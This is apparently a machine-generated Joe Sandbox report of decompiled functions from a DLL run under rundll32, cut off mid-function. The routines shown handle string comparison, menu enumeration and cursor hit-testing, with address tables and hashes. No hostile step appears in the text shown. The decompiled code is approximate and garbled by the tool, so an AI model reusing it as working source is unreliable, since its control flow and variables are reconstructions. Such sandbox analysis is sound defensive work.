                                                                        • Instruction ID: b13861e3b3a9cf7542cab635660fc4a1c16e305f76032743bd7b4f367fd9abdc
                                                                        • Opcode Fuzzy Hash: 8158596c318f4b29e2ea174aebcc45438b4c79fb446a46a39ef3e5a8401bcbca
                                                                        • Instruction Fuzzy Hash: BDF0317A604A76DFE2029FA6AC8894FB6ECEFD1291B024566F901E7251CB24DC0187A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E1001C425(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t94;
                                                                        				int _t95;
                                                                        				int _t98;
                                                                        				short* _t106;
                                                                        				int _t109;
                                                                        				short* _t111;
                                                                        				short* _t118;
                                                                        				short* _t119;
                                                                        				short* _t126;
                                                                        				char* _t132;
                                                                        				char* _t133;
                                                                        				long _t139;
                                                                        				int _t141;
                                                                        				int _t142;
                                                                        				int _t143;
                                                                        				int _t144;
                                                                        				char _t154;
                                                                        				char _t156;
                                                                        				short* _t159;
                                                                        				short* _t160;
                                                                        				short* _t162;
                                                                        				int _t165;
                                                                        				void* _t166;
                                                                        				void* _t167;
                                                                        				short* _t168;
                                                                        				void* _t173;
                                                                        
                                                                        				_push(0x40);
                                                                        				_push(0x10042fa0);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t94 =  *0x1004c470; // 0x1bfbe703
                                                                        				 *((intOrPtr*)(_t167 - 0x1c)) = _t94;
                                                                        				_t162 = 0;
                                                                        				_t165 = 1;
                                                                        				_t173 =  *0x1004f8b0 - _t162; // 0x0
                                                                        				if(_t173 == 0) {
                                                                        					if(CompareStringW(0, 0, 0x10042704, 1, 0x10042704, 1) == 0) {
                                                                        						_t139 = GetLastError();
                                                                        						__eflags = _t139 - 0x78;
                                                                        						if(_t139 == 0x78) {
                                                                        							 *0x1004f8b0 = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f8b0 = 1;
                                                                        					}
                                                                        				}
                                                                        				if( *(_t167 + 0x14) > _t162) {
                                                                        					 *(_t167 + 0x14) = E1001C409( *(_t167 + 0x10),  *(_t167 + 0x14));
                                                                        				}
                                                                        				_t95 =  *(_t167 + 0x1c);
                                                                        				if(_t95 > _t162) {
                                                                        					_t95 = E1001C409( *(_t167 + 0x18), _t95);
                                                                        					 *(_t167 + 0x1c) = _t95;
                                                                        				}
                                                                        				_t144 =  *0x1004f8b0; // 0x0
                                                                        				_t141 = 2;
                                                                        				if(_t144 == _t141 || _t144 == _t162) {
                                                                        					 *(_t167 - 0x38) = _t162;
                                                                        					__eflags =  *(_t167 + 8) - _t162;
                                                                        					if( *(_t167 + 8) == _t162) {
                                                                        						_t109 =  *0x1004f724; // 0x0
                                                                        						 *(_t167 + 8) = _t109;
                                                                        					}
                                                                        					_t142 =  *(_t167 + 0x20);
                                                                        					__eflags = _t142 - _t162;
                                                                        					if(_t142 == _t162) {
                                                                        						_t142 =  *0x1004f734; // 0x0
                                                                        					}
                                                                        					_t166 = E1001A444(_t142,  *(_t167 + 8));
                                                                        					__eflags = _t166 - 0xffffffff;
                                                                        					if(_t166 != 0xffffffff) {
                                                                        						__eflags = _t166 - _t142;
                                                                        						if(__eflags == 0) {
                                                                        							L67:
                                                                        							_t165 = CompareStringA( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 + 0x10),  *(_t167 + 0x14),  *(_t167 + 0x18),  *(_t167 + 0x1c));
                                                                        							__eflags = _t162;
                                                                        							if(__eflags != 0) {
                                                                        								_push(_t162);
                                                                        								E100107C8(_t142, _t162, _t165, __eflags);
                                                                        								_push( *(_t167 - 0x38));
                                                                        								E100107C8(_t142, _t162, _t165, __eflags);
                                                                        							}
                                                                        							goto L69;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t167 + 0x14);
                                                                        						_push( *(_t167 + 0x10));
                                                                        						_push(_t166);
                                                                        						_push(_t142);
                                                                        						_t162 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                        						__eflags = _t162;
                                                                        						if(__eflags == 0) {
                                                                        							goto L61;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t167 + 0x1c);
                                                                        						_push( *(_t167 + 0x18));
                                                                        						_push(_t166);
                                                                        						_push(_t142);
                                                                        						_t106 = E1001A487(_t142, _t162, _t166, __eflags);
                                                                        						 *(_t167 - 0x38) = _t106;
                                                                        						__eflags = _t106;
                                                                        						if(__eflags != 0) {
                                                                        							 *(_t167 + 0x10) = _t162;
                                                                        							 *(_t167 + 0x18) =  *(_t167 - 0x38);
                                                                        							goto L67;
                                                                        						}
                                                                        						_push(_t162);
                                                                        						E100107C8(_t142, _t162, _t166, __eflags);
                                                                        					}
                                                                        					goto L61;
                                                                        				} else {
                                                                        					if(_t144 != _t165) {
                                                                        						L61:
                                                                        						_t98 = 0;
                                                                        						L70:
                                                                        						return E1001254F(E100117AE(_t98,  *((intOrPtr*)(_t167 - 0x1c))));
                                                                        					}
                                                                        					 *(_t167 - 0x3c) = _t162;
                                                                        					 *(_t167 - 0x44) = _t162;
                                                                        					 *(_t167 - 0x40) = _t162;
                                                                        					if( *(_t167 + 0x20) == _t162) {
                                                                        						_t144 =  *0x1004f734; // 0x0
                                                                        						 *(_t167 + 0x20) = _t144;
                                                                        					}
                                                                        					if( *(_t167 + 0x14) == _t162 || _t95 == _t162) {
                                                                        						if( *(_t167 + 0x14) != _t95) {
                                                                        							__eflags = _t95 - _t165;
                                                                        							if(_t95 > _t165) {
                                                                        								L69:
                                                                        								_t98 = _t165;
                                                                        								goto L70;
                                                                        							}
                                                                        							__eflags =  *(_t167 + 0x14) - _t165;
                                                                        							if( *(_t167 + 0x14) <= _t165) {
                                                                        								_t111 = GetCPInfo( *(_t167 + 0x20), _t167 - 0x30);
                                                                        								__eflags = _t111;
                                                                        								if(_t111 == 0) {
                                                                        									goto L61;
                                                                        								}
                                                                        								__eflags =  *(_t167 + 0x14) - _t162;
                                                                        								if( *(_t167 + 0x14) <= _t162) {
                                                                        									__eflags =  *(_t167 + 0x1c) - _t162;
                                                                        									if( *(_t167 + 0x1c) <= _t162) {
                                                                        										goto L38;
                                                                        									}
                                                                        									__eflags =  *(_t167 - 0x30) - _t141;
                                                                        									if( *(_t167 - 0x30) < _t141) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t132 = _t167 - 0x2a;
                                                                        									__eflags =  *((char*)(_t167 - 0x2a));
                                                                        									if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                        										goto L69;
                                                                        									} else {
                                                                        										goto L33;
                                                                        									}
                                                                        									while(1) {
                                                                        										L33:
                                                                        										_t159 =  *((intOrPtr*)(_t132 + 1));
                                                                        										__eflags = _t159;
                                                                        										if(_t159 == 0) {
                                                                        											goto L69;
                                                                        										}
                                                                        										_t154 =  *( *(_t167 + 0x18));
                                                                        										__eflags = _t154 -  *_t132;
                                                                        										if(_t154 <  *_t132) {
                                                                        											L36:
                                                                        											_t132 = _t132 + _t141;
                                                                        											__eflags =  *_t132;
                                                                        											if( *_t132 != 0) {
                                                                        												continue;
                                                                        											}
                                                                        											goto L69;
                                                                        										}
                                                                        										__eflags = _t154 - _t159;
                                                                        										if(_t154 <= _t159) {
                                                                        											goto L17;
                                                                        										}
                                                                        										goto L36;
                                                                        									}
                                                                        									goto L69;
                                                                        								}
                                                                        								__eflags =  *(_t167 - 0x30) - _t141;
                                                                        								if( *(_t167 - 0x30) < _t141) {
                                                                        									goto L20;
                                                                        								}
                                                                        								_t133 = _t167 - 0x2a;
                                                                        								__eflags =  *((char*)(_t167 - 0x2a));
                                                                        								if( *((char*)(_t167 - 0x2a)) == 0) {
                                                                        									goto L20;
                                                                        								} else {
                                                                        									goto L25;
                                                                        								}
                                                                        								while(1) {
                                                                        									L25:
                                                                        									_t160 =  *((intOrPtr*)(_t133 + 1));
                                                                        									__eflags = _t160;
                                                                        									if(_t160 == 0) {
                                                                        										goto L20;
                                                                        									}
                                                                        									_t156 =  *( *(_t167 + 0x10));
                                                                        									__eflags = _t156 -  *_t133;
                                                                        									if(_t156 <  *_t133) {
                                                                        										L28:
                                                                        										_t133 = _t133 + _t141;
                                                                        										__eflags =  *_t133;
                                                                        										if( *_t133 != 0) {
                                                                        											continue;
                                                                        										}
                                                                        										goto L20;
                                                                        									}
                                                                        									__eflags = _t156 - _t160;
                                                                        									if(_t156 <= _t160) {
                                                                        										goto L17;
                                                                        									}
                                                                        									goto L28;
                                                                        								}
                                                                        							}
                                                                        							L20:
                                                                        							_t98 = 3;
                                                                        							goto L70;
                                                                        						}
                                                                        						L17:
                                                                        						_t98 = _t141;
                                                                        						goto L70;
                                                                        					} else {
                                                                        						L38:
                                                                        						_t143 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x10),  *(_t167 + 0x14), _t162, _t162);
                                                                        						 *(_t167 - 0x48) = _t143;
                                                                        						__eflags = _t143 - _t162;
                                                                        						if(_t143 == _t162) {
                                                                        							goto L61;
                                                                        						}
                                                                        						 *(_t167 - 4) = _t162;
                                                                        						E10010B20(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
                                                                        						 *(_t167 - 0x18) = _t168;
                                                                        						 *(_t167 - 0x34) = _t168;
                                                                        						 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                        						_t118 =  *(_t167 - 0x34);
                                                                        						__eflags = _t118 - _t162;
                                                                        						if(_t118 != _t162) {
                                                                        							L43:
                                                                        							_t119 = MultiByteToWideChar( *(_t167 + 0x20), _t165,  *(_t167 + 0x10),  *(_t167 + 0x14), _t118, _t143);
                                                                        							__eflags = _t119;
                                                                        							if(_t119 == 0) {
                                                                        								L53:
                                                                        								__eflags =  *(_t167 - 0x3c);
                                                                        								if(__eflags != 0) {
                                                                        									_push( *(_t167 - 0x34));
                                                                        									E100107C8(_t143, _t162, _t165, __eflags);
                                                                        								}
                                                                        								_t98 =  *(_t167 - 0x40);
                                                                        								goto L70;
                                                                        							}
                                                                        							_t165 = MultiByteToWideChar( *(_t167 + 0x20), 9,  *(_t167 + 0x18),  *(_t167 + 0x1c), 0, 0);
                                                                        							 *(_t167 - 0x4c) = _t165;
                                                                        							__eflags = _t165;
                                                                        							if(_t165 == 0) {
                                                                        								goto L53;
                                                                        							}
                                                                        							 *(_t167 - 4) = 1;
                                                                        							E10010B20(_t165 + _t165 + 0x00000003 & 0xfffffffc, _t144);
                                                                        							 *(_t167 - 0x18) = _t168;
                                                                        							_t162 = _t168;
                                                                        							 *(_t167 - 0x50) = _t162;
                                                                        							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
                                                                        							__eflags = _t162;
                                                                        							if(_t162 != 0) {
                                                                        								L49:
                                                                        								_t126 = MultiByteToWideChar( *(_t167 + 0x20), 1,  *(_t167 + 0x18),  *(_t167 + 0x1c), _t162, _t165);
                                                                        								__eflags = _t126;
                                                                        								if(_t126 != 0) {
                                                                        									 *(_t167 - 0x40) = CompareStringW( *(_t167 + 8),  *(_t167 + 0xc),  *(_t167 - 0x34), _t143, _t162, _t165);
                                                                        								}
                                                                        								__eflags =  *(_t167 - 0x44);
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t162);
                                                                        									E100107C8(_t143, _t162, _t165, __eflags);
                                                                        								}
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t162 = E100107B6(_t165 + _t165);
                                                                        								__eflags = _t162;
                                                                        								if(_t162 == 0) {
                                                                        									goto L53;
                                                                        								}
                                                                        								 *(_t167 - 0x44) = 1;
                                                                        								goto L49;
                                                                        							}
                                                                        						} else {
                                                                        							_t118 = E100107B6(_t143 + _t143);
                                                                        							_pop(_t144);
                                                                        							 *(_t167 - 0x34) = _t118;
                                                                        							__eflags = _t118 - _t162;
                                                                        							if(_t118 == _t162) {
                                                                        								goto L61;
                                                                        							}
                                                                        							 *(_t167 - 0x3c) = _t165;
                                                                        							goto L43;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}





























                                                                        0x1001c7a8
                                                                        0x1001c4c1
                                                                        0x1001c4c4
                                                                        0x1001c4c7
                                                                        0x1001c4cd
                                                                        0x1001c4cf
                                                                        0x1001c4d5
                                                                        0x1001c4d5
                                                                        0x1001c4db
                                                                        0x1001c4e8
                                                                        0x1001c4f1
                                                                        0x1001c4f3
                                                                        0x1001c796
                                                                        0x1001c796
                                                                        0x00000000
                                                                        0x1001c796
                                                                        0x1001c4f9
                                                                        0x1001c4fc
                                                                        0x1001c50d
                                                                        0x1001c513
                                                                        0x1001c515
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c51b
                                                                        0x1001c51e
                                                                        0x1001c54b
                                                                        0x1001c54e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c550
                                                                        0x1001c553
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c559
                                                                        0x1001c55c
                                                                        0x1001c560
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c566
                                                                        0x1001c569
                                                                        0x1001c56b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c574
                                                                        0x1001c576
                                                                        0x1001c578
                                                                        0x1001c582
                                                                        0x1001c582
                                                                        0x1001c584
                                                                        0x1001c587
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c589
                                                                        0x1001c57a
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c57c
                                                                        0x00000000
                                                                        0x1001c566
                                                                        0x1001c520
                                                                        0x1001c523
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c525
                                                                        0x1001c528
                                                                        0x1001c52c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c52e
                                                                        0x1001c531
                                                                        0x1001c533
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c538
                                                                        0x1001c53a
                                                                        0x1001c53c
                                                                        0x1001c542
                                                                        0x1001c542
                                                                        0x1001c544
                                                                        0x1001c547
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c549
                                                                        0x1001c53e
                                                                        0x1001c540
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c540
                                                                        0x1001c52e
                                                                        0x1001c4fe
                                                                        0x1001c500
                                                                        0x00000000
                                                                        0x1001c500
                                                                        0x1001c4ea
                                                                        0x1001c4ea
                                                                        0x00000000
                                                                        0x1001c58e
                                                                        0x1001c58e
                                                                        0x1001c5a1
                                                                        0x1001c5a3
                                                                        0x1001c5a6
                                                                        0x1001c5a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c5ae
                                                                        0x1001c5ba
                                                                        0x1001c5bf
                                                                        0x1001c5c4
                                                                        0x1001c5c7
                                                                        0x1001c5e9
                                                                        0x1001c5ec
                                                                        0x1001c5ee
                                                                        0x1001c608
                                                                        0x1001c614
                                                                        0x1001c61a
                                                                        0x1001c61c
                                                                        0x1001c6d3
                                                                        0x1001c6d3
                                                                        0x1001c6d7
                                                                        0x1001c6d9
                                                                        0x1001c6dc
                                                                        0x1001c6e1
                                                                        0x1001c6e2
                                                                        0x00000000
                                                                        0x1001c6e2
                                                                        0x1001c637
                                                                        0x1001c639
                                                                        0x1001c63c
                                                                        0x1001c63e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c644
                                                                        0x1001c654
                                                                        0x1001c659
                                                                        0x1001c65c
                                                                        0x1001c65e
                                                                        0x1001c661
                                                                        0x1001c67f
                                                                        0x1001c681
                                                                        0x1001c69a
                                                                        0x1001c6a7
                                                                        0x1001c6ad
                                                                        0x1001c6af
                                                                        0x1001c6c3
                                                                        0x1001c6c3
                                                                        0x1001c6c6
                                                                        0x1001c6ca
                                                                        0x1001c6cc
                                                                        0x1001c6cd
                                                                        0x1001c6d2
                                                                        0x00000000
                                                                        0x1001c683
                                                                        0x1001c68d
                                                                        0x1001c68f
                                                                        0x1001c691
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x00000000
                                                                        0x1001c693
                                                                        0x1001c5f0
                                                                        0x1001c5f4
                                                                        0x1001c5f9
                                                                        0x1001c5fa
                                                                        0x1001c5fd
                                                                        0x1001c5ff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x00000000
                                                                        0x1001c605
                                                                        0x1001c5ee
                                                                        0x1001c4db

                                                                        APIs
                                                                        • CompareStringW.KERNEL32(00000000,00000000,10042704,00000001,10042704,00000001,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?), ref: 1001C451
                                                                        • GetLastError.KERNEL32(?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC,10042CD0,00000018,10019429,10042CE0,00000008,10013474), ref: 1001C463
                                                                        • GetCPInfo.KERNEL32(00000000,00000000,10042FA0,00000040,1001BF03,?,00000001,?,00000000,?,00000000,?,?,1001AE49,00000000,00000000), ref: 1001C50D
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C59B
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C614
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                        • String ID:
                                                                        • API String ID: 1773772771-0
                                                                        • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                        • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				signed int _v32;
                                                                        				intOrPtr _v36;
                                                                        				signed int _v40;
                                                                        				int _v44;
                                                                        				char _v48;
                                                                        				void* __ebp;
                                                                        				int _t59;
                                                                        				int _t60;
                                                                        				void* _t61;
                                                                        				int _t63;
                                                                        				signed int _t67;
                                                                        				int _t68;
                                                                        				void* _t69;
                                                                        				int _t71;
                                                                        				intOrPtr _t74;
                                                                        				int _t75;
                                                                        				int _t76;
                                                                        				struct HMENU__* _t88;
                                                                        				intOrPtr _t90;
                                                                        
                                                                        				_t74 = __ecx;
                                                                        				_v8 = __ecx;
                                                                        				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
                                                                        				if(_a12 == 0) {
                                                                        					_t90 = _a4;
                                                                        					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                                                                        						L3:
                                                                        						E1001FFB4( &_v48);
                                                                        						_v36 = _t90;
                                                                        						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
                                                                        							if(GetMenu( *(_t74 + 0x1c)) == 0) {
                                                                        								L14:
                                                                        								_t59 = GetMenuItemCount( *(_t90 + 4));
                                                                        								_v40 = _v40 & 0x00000000;
                                                                        								_v16 = _t59;
                                                                        								if(_t59 <= 0) {
                                                                        									L34:
                                                                        									L35:
                                                                        									return _t59;
                                                                        								}
                                                                        								do {
                                                                        									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
                                                                        									_v44 = _t60;
                                                                        									if(_t60 == 0) {
                                                                        										goto L33;
                                                                        									}
                                                                        									if(_t60 != 0xffffffff) {
                                                                        										_v32 = _v32 & 0x00000000;
                                                                        										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
                                                                        											_t61 = 0;
                                                                        										} else {
                                                                        											_t61 = 1;
                                                                        										}
                                                                        										_push(_t61);
                                                                        										L27:
                                                                        										_push(_t74);
                                                                        										E1001FFDA( &_v48);
                                                                        										_t63 = GetMenuItemCount( *(_t90 + 4));
                                                                        										_t75 = _t63;
                                                                        										if(_t75 >= _v16) {
                                                                        											L32:
                                                                        											_v16 = _t75;
                                                                        											_t74 = _v8;
                                                                        											goto L33;
                                                                        										}
                                                                        										_v40 = _v40 + _t63 - _v16;
                                                                        										while(_v40 < _t75) {
                                                                        											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
                                                                        												goto L32;
                                                                        											}
                                                                        											_v40 = _v40 + 1;
                                                                        										}
                                                                        										goto L32;
                                                                        									}
                                                                        									_t67 = E1000822C(_t90, _v40);
                                                                        									_v32 = _t67;
                                                                        									if(_t67 == 0) {
                                                                        										goto L33;
                                                                        									}
                                                                        									_t68 = GetMenuItemID( *(_t67 + 4), 0);
                                                                        									_v44 = _t68;
                                                                        									if(_t68 != 0 && _t68 != 0xffffffff) {
                                                                        										_push(0);
                                                                        										goto L27;
                                                                        									}
                                                                        									L33:
                                                                        									_v40 = _v40 + 1;
                                                                        									_t59 = _v40;
                                                                        								} while (_t59 < _v16);
                                                                        								goto L34;
                                                                        							}
                                                                        							_t69 = E10023092(_t74);
                                                                        							if(_t69 == 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t88 = GetMenu( *(_t69 + 0x1c));
                                                                        							if(_t88 == 0) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t71 = GetMenuItemCount(_t88);
                                                                        							_t76 = 0;
                                                                        							_a12 = _t71;
                                                                        							if(_t71 <= 0) {
                                                                        								L13:
                                                                        								_t74 = _v8;
                                                                        								goto L14;
                                                                        							}
                                                                        							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
                                                                        								_t76 = _t76 + 1;
                                                                        								if(_t76 < _a12) {
                                                                        									continue;
                                                                        								}
                                                                        								goto L13;
                                                                        							}
                                                                        							_push(_t88);
                                                                        							_v12 = E10026280();
                                                                        							goto L13;
                                                                        						}
                                                                        						_v12 = _t90;
                                                                        						goto L14;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(_a8);
                                                                        					_push(_t90);
                                                                        					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
                                                                        					if(0 != 0) {
                                                                        						goto L35;
                                                                        					}
                                                                        					goto L3;
                                                                        				}
                                                                        				return 0;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                          • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                          • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                        • GetMenu.USER32(?), ref: 10032170
                                                                        • GetMenu.USER32(?), ref: 10032184
                                                                        • GetMenuItemCount.USER32 ref: 1003218D
                                                                        • GetSubMenu.USER32 ref: 1003219E
                                                                        • GetMenuItemCount.USER32 ref: 100321C0
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                        • GetMenuItemCount.USER32 ref: 10032240
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4186786570-0
                                                                        • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                        • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 97%
                                                                        			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
                                                                        				signed int _v8;
                                                                        				intOrPtr _v12;
                                                                        				struct tagPOINT _v20;
                                                                        				void* __ebp;
                                                                        				short _t42;
                                                                        				signed int _t49;
                                                                        				struct HWND__* _t60;
                                                                        				intOrPtr _t63;
                                                                        				intOrPtr _t66;
                                                                        				void* _t68;
                                                                        				void* _t71;
                                                                        				void* _t74;
                                                                        				intOrPtr _t83;
                                                                        				void* _t84;
                                                                        				intOrPtr _t85;
                                                                        				struct HWND__* _t87;
                                                                        				intOrPtr _t88;
                                                                        				intOrPtr* _t89;
                                                                        				void* _t90;
                                                                        
                                                                        				_t89 = __ecx;
                                                                        				_t42 = GetKeyState(1);
                                                                        				if(_t42 < 0) {
                                                                        					return _t42;
                                                                        				}
                                                                        				_t85 = E100373DB();
                                                                        				_v12 = _t85;
                                                                        				GetCursorPos( &_v20);
                                                                        				ScreenToClient( *(_t89 + 0x1c),  &_v20);
                                                                        				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
                                                                        				_v8 = _t49;
                                                                        				if(_t49 < 0) {
                                                                        					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
                                                                        				} else {
                                                                        					_t74 = E10023092(_t89);
                                                                        					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
                                                                        						_v8 = _v8 | 0xffffffff;
                                                                        					}
                                                                        					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                        					if(_t66 != 0) {
                                                                        						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                        					} else {
                                                                        						_t88 = 0;
                                                                        					}
                                                                        					_t68 = E100220EE(_t90, GetCapture());
                                                                        					if(_t68 != _t89) {
                                                                        						if(_t68 != 0) {
                                                                        							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
                                                                        						} else {
                                                                        							_t83 = 0;
                                                                        						}
                                                                        						if(_t83 != _t88 && E10023092(_t68) == _t74) {
                                                                        							_v8 = _v8 | 0xffffffff;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				if(_v8 < 0) {
                                                                        					L25:
                                                                        					if( *(_v12 + 0x78) == 0xffffffff) {
                                                                        						KillTimer( *(_t89 + 0x1c), 0xe001);
                                                                        					}
                                                                        					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
                                                                        					goto L28;
                                                                        				} else {
                                                                        					ClientToScreen( *(_t89 + 0x1c),  &_v20);
                                                                        					_push(_v20.y);
                                                                        					_t87 = WindowFromPoint(_v20);
                                                                        					if(_t87 == 0) {
                                                                        						L23:
                                                                        						_t59 = _v12;
                                                                        						_v8 = _v8 | 0xffffffff;
                                                                        						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
                                                                        						L24:
                                                                        						if(_v8 >= 0) {
                                                                        							L28:
                                                                        							_t53 = 0xe000;
                                                                        							if(_a4 == 0xe000) {
                                                                        								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
                                                                        								if(_v8 >= 0) {
                                                                        									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
                                                                        								}
